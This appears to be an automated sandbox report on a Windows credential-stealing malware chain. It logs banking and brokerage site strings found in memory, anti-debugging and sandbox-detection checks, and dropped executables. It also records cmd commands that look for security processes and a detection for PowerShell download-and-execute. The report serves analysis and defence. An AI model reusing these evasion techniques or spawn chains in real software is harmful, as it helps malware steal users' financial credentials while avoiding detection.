0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2856295783.00000130BDC1D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: KJEHJKJE.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KJEHJKJE.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2273581727.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.3002033924.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2917481359.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2968342255.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2927088647.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2999657910.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2979868835.000001F16D745000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~V
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: KJEHJKJE.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: KJEHJKJE.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2947483134.00000000065A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2866002491.00000130BDD00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD806000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"<
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81814
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81828
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-82992
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81817
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81835
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81857
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81836
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81656

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Code function: 5_2_04EC0983 rdtsc

5_2_04EC0983

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0041ACFA

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h]

0_2_00419160

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter,	0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041A718
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C70B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C70B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C8BAC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

Source: firefox.exe, 00000028.00000002.2853946051.000000BCB0EBB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWindow
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: TProgram Manager
Source: PharmaciesDetection.exe, 00000015.00000003.2671343184.00000000027AB000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
Source: RoamingAEGIJKEHCA.exe, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: FM/Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C70B341 cpuid

0_2_6C70B341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00417630

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Queries volume information: C:\ VolumeInformation
